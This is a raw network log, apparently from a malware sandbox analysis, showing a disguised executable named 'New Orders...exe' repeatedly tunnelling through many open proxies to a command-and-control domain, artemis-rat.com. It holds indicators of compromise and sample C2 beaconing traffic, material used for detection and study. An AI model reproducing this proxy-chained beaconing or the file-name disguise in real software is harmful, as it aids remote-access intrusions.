                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.823832035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.930619955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.945208073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.945375919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.945008039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:28.945034027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:52.945383072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:40.976311922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        264192.168.2.950609185.191.236.16231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.716589928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.189517021 CET39INHTTP/1.1 200 Connection established
                                                                                        Mar 11, 2024 16:16:42.169836044 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        265192.168.2.949978142.54.229.24941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.719264030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        266192.168.2.950686174.64.199.8241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.722014904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        267192.168.2.9497588.209.255.1331287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.732270956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.809051991 CET38INHTTP/1.1 200 OK
                                                                                        content-length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        268192.168.2.950752147.124.212.31367797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.737248898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        269192.168.2.95072867.43.236.18130877672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.740566015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        270192.168.2.95069752.67.10.18331287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.776875019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.098565102 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        271192.168.2.95070243.129.228.4678917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.778784990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        272192.168.2.949868105.174.40.5480807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.781599998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.773286104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.773484945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.038477898 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        273192.168.2.95067149.228.131.16950007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.781651974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        274192.168.2.949950207.180.234.220393237672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.788561106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.824027061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.930613041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.945231915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.945374966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.945009947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:28.947437048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        275192.168.2.95000992.204.134.38286957672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.790297985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.823964119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        276192.168.2.95077272.10.160.90236857672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.791347027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        277192.168.2.95068343.133.136.20888007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.794166088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        278192.168.2.95072172.210.221.22341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.807219028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        279192.168.2.950810104.27.26.29807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.808665037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.963165998 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        280192.168.2.950713147.75.34.86100037672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.808731079 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:41.108297110 CET65INHTTP/1.1 200 Connection Established
                                                                                        Proxy-Agent: Zscaler/6.3


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        281192.168.2.95072572.195.34.4141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.809236050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        282192.168.2.950814172.67.181.12807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.810798883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.965338945 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        283192.168.2.950710193.239.56.8480817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.811060905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        284192.168.2.950822104.27.37.131807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.811136007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.965728045 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        285192.168.2.95073651.68.220.20180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.818007946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.150609970 CET28INHTTP/1.0 502 Bad Gateway


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        286192.168.2.950726152.32.130.117180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.819747925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        287192.168.2.95074345.81.232.17176397672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.827378035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.460530996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.351202965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.273549080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        288192.168.2.949970159.223.71.71592437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.827403069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.823983908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.930628061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.945230007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        289192.168.2.95073835.199.90.22588887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.838402987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.907371044 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        290192.168.2.95000851.178.43.14731287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.849814892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
